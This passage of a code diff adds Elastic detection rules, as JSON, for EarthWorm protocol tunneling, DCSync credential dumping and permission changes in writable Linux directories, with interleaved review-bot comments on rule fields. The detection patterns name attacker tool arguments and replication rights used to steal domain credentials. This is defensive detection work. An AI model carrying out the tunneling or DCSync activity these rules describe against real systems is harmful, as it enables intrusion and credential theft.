"9d19ece6-c20e-481a-90c5-ccca596537de_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_110.json b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_110.json new file mode 100644 index 00000000000..00fa2794882 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_110.json 
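Review bot: `9d19ece6-c20e-481a-90c5-ccca596537de_106.json` sets `"from": "now-9m"` but, unlike the other EQL rules added in this commit (the EarthWorm rule further down sets `"timestamp_override": "event.ingested"`), it has no `timestamp_override`, so the nine-minute lookback is applied against `@timestamp` and events that arrive with ingest delay can fall outside the window and never be evaluated. If the omission is deliberate for this sequence rule it is worth saying so in `setup`; otherwise add `"timestamp_override": "event.ingested",` before `"type": "eql"`. Separately, the second sequence step matches only `process.args == "load"`; whether the `bootstrap` subcommand of `launchctl` should also be covered is a coverage decision that the rule's `description` or `note` should state either way.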
@@ -0,0 +1,80 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of the EarthWorm tunneler. Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection and network filtering, or to enable access to otherwise unreachable systems.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Protocol Tunneling via EarthWorm", + "note": "## Triage and analysis\n\n### Investigating Potential Protocol Tunneling via EarthWorm\n\nAttackers can leverage `earthworm` to clandestinely tunnel network communications and evade security measures, potentially gaining unauthorized access to sensitive systems.\n\nThis rule looks for several command line arguments that are consistent with `earthworm` tunneling behavior. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate protocol tunneling. 
This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Potential Protocol Tunneling via Chisel Client - 3f12325a-4cc6-410b-8d4c-9fbbeb744cfd\n- Potential Protocol Tunneling via Chisel Server - ac8805f6-1e08-406c-962e-3937057fa86f\n- Potential Linux Tunneling and/or Port Forwarding - 6ee947e9-de7e-4281-a55d-09289bdf947e\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator or developer who uses port tunneling for benign purposes, consider adding exceptions for specific user accounts or hosts. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n process.args : \"-s\" and process.args : \"-d\" and process.args : \"rssocks\"\n", + "references": [ + "http://rootkiter.com/EarthWorm/", + "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9f1c4ca3-44b5-481d-ba42-32dc215a2769", + "setup": "## Setup\n\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "9f1c4ca3-44b5-481d-ba42-32dc215a2769_110", + "type": "security-rule" +} \ No newline at end of file 
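Review bot: The `setup` text in `9f1c4ca3-44b5-481d-ba42-32dc215a2769_110.json` links the agent-policy guide at a pinned version, `https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html`, whereas the same sentence in the LaunchDaemon rule added earlier in this commit links `https://www.elastic.co/guide/en/fleet/current/agent-policy.html`; a pinned link goes stale and diverges from the `current` links used everywhere else in these files. Changing `fleet/8.10/` to `fleet/current/` makes the guidance consistent. As with the other files, this is presumably corrected at the upstream rule source rather than in the generated package copy.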
diff --git a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_112.json b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_112.json new file mode 100644 index 00000000000..2cc40d9b651 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_112.json 
@@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule identifies when a User Account starts the Active Directory Replication Process. Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Credential Access via DCSync", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via DCSync\n\nActive Directory replication is the process by which the changes that originate on one domain controller are automatically transferred to other domain controllers that store the same data.\n\nActive Directory data consists of objects that have properties, or attributes. Each object is an instance of an object class, and object classes and their respective attributes are defined in the Active Directory schema. Objects are defined by the values of their attributes, and changes to attribute values must be transferred from the domain controller on which they occur to every other domain controller that stores a replica of an affected object.\n\nAdversaries can use the DCSync technique that uses Windows Domain Controller's API to simulate the replication process from a remote domain controller, compromising major credential material such as the Kerberos krbtgt keys used legitimately for tickets creation, but also tickets forging by attackers. This attack requires some extended privileges to succeed (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which are granted by default to members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups. 
Privileged accounts can be abused to grant controlled objects the right to DCsync/Replicate.\n\nMore details can be found on [Threat Hunter Playbook](https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing) and [The Hacker Recipes](https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync).\n\nThis rule monitors for Event ID 4662 (Operation was performed on an Active Directory object) and identifies events that use the access mask 0x100 (Control Access) and properties that contain at least one of the following or their equivalent Schema-Id-GUID (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, DS-Replication-Get-Changes-In-Filtered-Set). It also filters out events that use computer accounts and also Azure AD Connect MSOL accounts (more details [here](https://techcommunity.microsoft.com/t5/microsoft-defender-for-identity/ad-connect-msol-user-suspected-dcsync-attack/m-p/788028)).\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Correlate security events 4662 and 4624 (Logon Type 3) by their Logon ID (`winlog.logon.id`) on the Domain Controller (DC) that received the replication request. This will tell you where the AD replication request came from, and if it came from another DC or not.\n- Scope which credentials were compromised (for example, whether all accounts were replicated or specific ones).\n\n### False positive analysis\n\n- Administrators may use custom accounts on Azure AD Connect, investigate if it is the case, and if it is properly secured. 
If noisy in your environment due to expected activity, consider adding the corresponding account as a exception.\n- Although replicating Active Directory (AD) data to non-Domain Controllers is not a common practice and is generally not recommended from a security perspective, some software vendors may require it for their products to function correctly. If this rule is noisy in your environment due to expected activity, consider adding the corresponding account as a exception.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Investigate how the attacker escalated privileges and identify systems they used to conduct lateral movement. 
Use this information to determine ways the attacker could regain access to the environment.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "query": "any where event.action : (\"Directory Service Access\", \"object-operation-performed\") and\n event.code == \"4662\" and winlog.event_data.Properties : (\n\n /* Control Access Rights/Permissions Symbol */\n\n \"*DS-Replication-Get-Changes*\",\n \"*DS-Replication-Get-Changes-All*\",\n \"*DS-Replication-Get-Changes-In-Filtered-Set*\",\n\n /* Identifying GUID used in ACE */\n\n \"*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2*\",\n \"*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2*\",\n \"*89e95b76-444d-4c62-991a-0facbeda640c*\")\n\n /* The right to perform an operation controlled by an extended access right. */\n\n and winlog.event_data.AccessMask : \"0x100\" and\n not winlog.event_data.SubjectUserName : (\n \"*$\", \"MSOL_*\", \"OpenDNS_Connector\", \"adconnect\", \"SyncADConnect\",\n \"SyncADConnectCM\", \"aadsync\", \"svcAzureADSync\", \"-\"\n )\n\n /* The Umbrella AD Connector uses the OpenDNS_Connector account to perform replication */\n", + "references": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html", + "https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing", + "https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/security/win_ad_replication_non_machine_account.yml", + "https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0027_windows_audit_directory_service_access.md", + "https://attack.stealthbits.com/privilege-escalation-using-mimikatz-dcsync", + 
"https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AccessMask", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.Properties", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "9f962927-1a4f-45f3-a57b-287f2c7029c1", + "setup": "\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Privilege Escalation", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.006", + "name": "DCSync", + "reference": "https://attack.mitre.org/techniques/T1003/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": 
"https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.002", + "name": "Domain Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "9f962927-1a4f-45f3-a57b-287f2c7029c1_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_113.json b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_113.json new file mode 100644 index 00000000000..bc2c07c29aa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_113.json 
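Review bot: The investigation guide in `9f962927-1a4f-45f3-a57b-287f2c7029c1_112.json` twice reads "consider adding the corresponding account as a exception" in its `note` string; it should be `as an exception`, and since this text is rendered to analysts in the alert view the wording matters. The `required_fields` entries for `winlog.event_data.AccessMask` and `winlog.event_data.Properties` are typed `unknown` while `winlog.event_data.SubjectUserName` is `keyword`; if that is tool output from the upstream schema it is fine, otherwise it is worth confirming these fields are mapped as keywords so the wildcard patterns in `query` behave as intended. The `_113` copy that follows is cut off at the end of this chunk, so I have not checked whether it carries the same text.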
@@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule identifies when a User Account starts the Active Directory Replication Process. Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Credential Access via DCSync", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via DCSync\n\nActive Directory replication is the process by which the changes that originate on one domain controller are automatically transferred to other domain controllers that store the same data.\n\nActive Directory data consists of objects that have properties, or attributes. Each object is an instance of an object class, and object classes and their respective attributes are defined in the Active Directory schema. Objects are defined by the values of their attributes, and changes to attribute values must be transferred from the domain controller on which they occur to every other domain controller that stores a replica of an affected object.\n\nAdversaries can use the DCSync technique that uses Windows Domain Controller's API to simulate the replication process from a remote domain controller, compromising major credential material such as the Kerberos krbtgt keys used legitimately for tickets creation, but also tickets forging by attackers. This attack requires some extended privileges to succeed (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which are granted by default to members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups. 
Privileged accounts can be abused to grant controlled objects the right to DCsync/Replicate.\n\nMore details can be found on [Threat Hunter Playbook](https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing) and [The Hacker Recipes](https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync).\n\nThis rule monitors for Event ID 4662 (Operation was performed on an Active Directory object) and identifies events that use the access mask 0x100 (Control Access) and properties that contain at least one of the following or their equivalent Schema-Id-GUID (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, DS-Replication-Get-Changes-In-Filtered-Set). It also filters out events that use computer accounts and also Azure AD Connect MSOL accounts (more details [here](https://techcommunity.microsoft.com/t5/microsoft-defender-for-identity/ad-connect-msol-user-suspected-dcsync-attack/m-p/788028)).\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Correlate security events 4662 and 4624 (Logon Type 3) by their Logon ID (`winlog.logon.id`) on the Domain Controller (DC) that received the replication request. This will tell you where the AD replication request came from, and if it came from another DC or not.\n- Scope which credentials were compromised (for example, whether all accounts were replicated or specific ones).\n\n### False positive analysis\n\n- Administrators may use custom accounts on Azure AD Connect, investigate if it is the case, and if it is properly secured. 
If noisy in your environment due to expected activity, consider adding the corresponding account as a exception.\n- Although replicating Active Directory (AD) data to non-Domain Controllers is not a common practice and is generally not recommended from a security perspective, some software vendors may require it for their products to function correctly. If this rule is noisy in your environment due to expected activity, consider adding the corresponding account as a exception.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Investigate how the attacker escalated privileges and identify systems they used to conduct lateral movement. 
Use this information to determine ways the attacker could regain access to the environment.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "any where event.action : (\"Directory Service Access\", \"object-operation-performed\") and\n event.code == \"4662\" and winlog.event_data.Properties : (\n\n /* Control Access Rights/Permissions Symbol */\n\n \"*DS-Replication-Get-Changes*\",\n \"*DS-Replication-Get-Changes-All*\",\n \"*DS-Replication-Get-Changes-In-Filtered-Set*\",\n\n /* Identifying GUID used in ACE */\n\n \"*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2*\",\n \"*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2*\",\n \"*89e95b76-444d-4c62-991a-0facbeda640c*\")\n\n /* The right to perform an operation controlled by an extended access right. */\n\n and winlog.event_data.AccessMask : \"0x100\" and\n not winlog.event_data.SubjectUserName : (\n \"*$\", \"MSOL_*\", \"OpenDNS_Connector\", \"adconnect\", \"SyncADConnect\",\n \"SyncADConnectCM\", \"aadsync\", \"svcAzureADSync\", \"-\"\n )\n\n /* The Umbrella AD Connector uses the OpenDNS_Connector account to perform replication */\n", + "references": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html", + "https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing", + "https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/security/win_ad_replication_non_machine_account.yml", + "https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0027_windows_audit_directory_service_access.md", + "https://attack.stealthbits.com/privilege-escalation-using-mimikatz-dcsync", + 
"https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AccessMask", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.Properties", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "9f962927-1a4f-45f3-a57b-287f2c7029c1", + "setup": "## Setup\n\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Privilege Escalation", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.006", + "name": "DCSync", + "reference": "https://attack.mitre.org/techniques/T1003/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": 
"https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.002", + "name": "Domain Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 113 + }, + "id": "9f962927-1a4f-45f3-a57b-287f2c7029c1_113", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_209.json b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_209.json new file mode 100644 index 00000000000..42efa8a0589 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_209.json 
@@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies file permission modifications in common writable directories by a non-root user. Adversaries often drop files or payloads into a writable directory and change permissions prior to execution.", + "false_positives": [ + "Certain programs or applications may modify files or change ownership in writable directories. These can be exempted by username." + ], + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "File Permission Modification in Writable Directory", + "new_terms_fields": [ + "host.id", + "process.parent.executable", + "process.command_line" + ], + "query": "host.os.type:linux and event.category:process and event.type:start and\nprocess.name:(chattr or chgrp or chmod or chown) and process.working_directory:(/dev/shm or /tmp or /var/tmp) and\nnot process.parent.name:(apt-key or update-motd-updates-available)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9f9a2a82-93a8-4b1a-8778-1780895626d4", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
